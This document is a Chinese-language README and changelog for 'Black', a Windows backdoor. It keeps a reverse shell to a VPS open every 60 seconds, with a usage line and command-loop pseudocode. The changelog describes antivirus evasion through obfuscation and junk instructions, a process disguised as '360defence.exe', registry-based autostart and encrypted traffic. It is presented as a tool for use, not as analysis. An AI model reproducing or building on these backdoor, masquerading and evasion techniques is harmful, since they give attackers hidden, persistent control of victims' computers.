- S端通过socket管道来传输command给C端,C端执行,实现简易的后门控制
- 采用TCP socket、传输稳定,不掉包(可能会出现粘包,未做边界分离)
- 靶机为C端,公网VPS为S端,C端不断发起连接,以防掉线
混淆代码,初步免杀
# Windows权限维持后门、持续反弹shell,60s/1次 Black v1.0 Usage: black.exe r_ip r_port author: NOVASEC_黑仔 if cmd == quit: 关闭管道,临时退出 elif cmd == exit: 程序结束,永久退出 else: 执行命令,回显结果
正常回显
暂时退出、断开后,60s再次连接,继续执行命令
永久退出、断开连接
靶机端口及进程情况:
被检测出了,建议隔离
在之前的基础上
增加花指令
增加程序图标
其他不变(进程名360defence.exe,双进程)
- 进行出网判断
- 流量加密
- 进阶免杀
- 等等...
- 不再提供免杀
- 修复bug,更稳定
- 增加注册自启动功能
运行前:
运行后:
重启验证:
- 新增Server端,取代NC,一对一控制(待优化)
- 增加Logo输出
- 简单的传输加密(待优化)
- 注册表添加自启动函数已注释,使用注册表自启动功能,请自行替换vps的ip和port后打包成exe,但360会查杀
- 缺陷:线程回收问题
S启动:
S命令执行
C端:
测试服务中断:
等待60s,又回来了
